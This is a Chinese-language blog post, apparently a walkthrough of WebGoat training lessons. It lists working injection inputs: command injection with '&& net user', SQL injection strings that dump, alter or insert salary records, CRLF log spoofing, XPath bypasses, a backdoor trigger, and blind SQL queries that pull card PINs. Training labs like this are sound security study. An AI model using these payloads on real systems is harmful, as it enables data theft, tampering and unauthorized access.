欢迎使用CSDN-markdown编辑器
来源:互联网 发布:windows 7正常没声音 编辑:程序博客网 时间:2024/04/29 10:38
CommandInjection(命令注入)
ep: cmd->ping www.baidu.com && net user
&& //两条命令连真执行
通过命令注入,查询网络IP地址和端口
输入“&ipconfig or net user
Numeric SQL Injection(SQL数字注入)
通过已知的数据注入 or 1=1 得到所有的数据
字符注入时一定要用单引号‘关闭
Log Spoofing(日志欺骗)
清除他们在日志中的痕迹。灰色区域代表在Web服务器的日志中的记录的内容
注入回车 :%0d
换行 :%0a
注入:
Tom%0d%0aLogin succeeded for username:admin
Xpath Injection(xpath注入)
尝试看到其他雇员以及他们的个人资料
万能密码,输入用户名和密码xxx’ or 1=1 or ‘a’=’a
String SQL Injection(字符串的SQL注入)
已知Smith用户,获得所有人的信息:Smith’ or ‘a’=’a–
LAB:SQL注入
Stage1:StringSQLInjection(第一阶段:字符串SQL注入)
密码处任意字符’or‘a’=’a
Stage3:NumericSQLInjection(第三阶段:数字SQL注入)
该课程的目的是通过注入语句,浏览到原本无法浏览的信息。通过一个普通员工的账户,浏览其BOSS的账户信息
101 or 1=1 order by salary desc
ModifyDatawithSQLInjection(修改数据注入)
以下表单允许用户通过userid查询自己的工资,这个表单存在SQL注入漏洞,这个课程的目的是修改jsmith的工资
jsmith’;update salaries set SALARY=’100000’ where USERID=’jsmith’;–
AddDatawithSQLInjection(添加数据注入)
jsmith’;insert into salaries(USERID,SALARY) values(‘tom’,’30000’);–
Database Backdoors(数据库后门)
它也用来作为存储的媒介。它也可以被用来作为存储恶意活动的地方,如触发器。触发器是在数据库管理系统上调用另一个数据库操作,如
insert,select,updateordelete。
你的目标是学习如何利用查询的脆弱性创建触发器。由于WebGoat使用的是mysql数据库,不支持触发器,所以该课程不会真正完成
102;update employee set Salary=’20000’
添加触发器
CREATE TRIGGER myBackDoor BEFORE INSERT ON employee FOR EACH ROW
BEGIN UPDATE employee SET email=’john@hackme.com’WHERE userid=NEW.userid
Blind Numeric SQL Injection(数字盲注)
可以由加入关键字“AND”和“OR”进行多个测试。创建一个SQL语句,您可以用来做一个真/假的测试,然后选择目标元素的第一个字符,利用>和<缩小查询范围
以下的表单允许一个用户输入一组数字并且验证正确和错误。使用这个表单在数据库上开发一个投true/false的测试
101 and ((select pin from pins where cc_number=’1111222233334444’)>2364)
Blind string SQL Injection(字符盲注)
下面的表格允许用户输入一个账号,如果它是有效的还是无效的决定。使用这种形式来开发一个真/假测试检查数据库中的其他条目。
参考Ascii值:’ A ’ = 65“Z”= 90 ’ A ’ = 97 = 122“Z”
目标是找到字段名称的值在表的行与cc_number针4321432143214321。类型为varchar字段,这是一个字符串。
把发现的名字通过教训。只有发现名字应该放入表单字段,密切关注拼写和大小写。
101 oder by 7
101 and (substring((select name from pins where cc_number=’4321432143214321’),1,1)<’J’)
- 欢迎使用CSDN-markdown编辑器
- 欢迎使用CSDN-markdown编辑器
- 欢迎使用CSDN-markdown编辑器
- 欢迎使用CSDN-markdown编辑器
- 欢迎使用CSDN-markdown编辑器
- 欢迎使用CSDN-markdown编辑器
- 欢迎使用CSDN-markdown编辑器
- 欢迎使用CSDN-markdown编辑器
- 欢迎使用CSDN-markdown编辑器
- 欢迎使用CSDN-markdown编辑器
- 欢迎使用CSDN-markdown编辑器
- 欢迎使用CSDN-markdown编辑器
- 欢迎使用CSDN-markdown编辑器
- 欢迎使用CSDN-markdown编辑器
- 欢迎使用CSDN-markdown编辑器
- 欢迎使用CSDN-markdown编辑器
- 欢迎使用CSDN-markdown编辑器
- 欢迎使用CSDN-markdown编辑器
- /usr/ucb/cc: language optional software package not installed
- Java工具类实现校验邮箱地址的有效性
- 多线程同步 Volatile 变量的使用
- 数据库查询左右连接
- HDOJ 1114 Piggy-Bank
- 欢迎使用CSDN-markdown编辑器
- 为何旅途中容易有艳遇?
- IOUtils的简单介绍
- 设计模式系列之 目录
- 泛型之类型推导
- Interface builder was unable to determine the type of xxx.xib
- Windows Server 2008在密码策略里禁用复杂密码
- Java工具类实现校验手机号码的有效性
- 一文读懂机器学习,大数据/自然语言处理/算法全有了……